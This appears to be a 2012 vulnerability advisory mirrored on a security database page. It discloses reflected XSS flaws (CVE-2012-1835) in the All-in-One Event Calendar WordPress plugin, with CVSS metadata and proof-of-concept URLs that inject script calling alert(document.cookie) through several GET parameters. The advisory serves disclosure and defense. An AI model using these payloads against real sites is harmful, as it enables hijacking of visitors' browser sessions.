Lucene search

K
htbridgeHigh-Tech BridgeHTB23082
HistoryMar 21, 2012 - 12:00 a.m.

Multiple XSS vulnerabilities in All-in-One Event Calendar Plugin for WordPress

2012-03-2100:00:00
High-Tech Bridge
www.htbridge.com
31

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

60.9%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in All-in-One Event Calendar Plugin for WordPress, which can be exploited to perform Cross-Site Scripting (XSS) attacks.

  1. Cross-Site Scripting (XSS) in All-in-One Event Calendar Plugin for WordPress: CVE-2012-1835
    1.1 Input passed via the “title” GET parameter to /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of the affected website.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widge t-form.php?title[id]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
    1.2 Input passed via the “args”, “title”, “before_title”, “after_title” GET parameters to /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of the affected website.
    The following PoC (Proof of Concept) demonstrate the vulnerabilities:
    http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widge t.php?args[before_widget]=%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E
    http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widge t.php?title=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widge t.php?title=1&before_title=%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E
    http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widge t.php?title=1&after_title=%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E
    1.3 Input passed via the “button_value” GET parameter to /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of the affected website.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_ button.php?button_value=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E
    1.4 Input passed via the “msg” GET parameter to /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of the affected website.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/save_success ful.php?msg=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    Successful exploitation of these vulnerabilities (1.1-1.4) requires that “register_globals” is enabled.

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

60.9%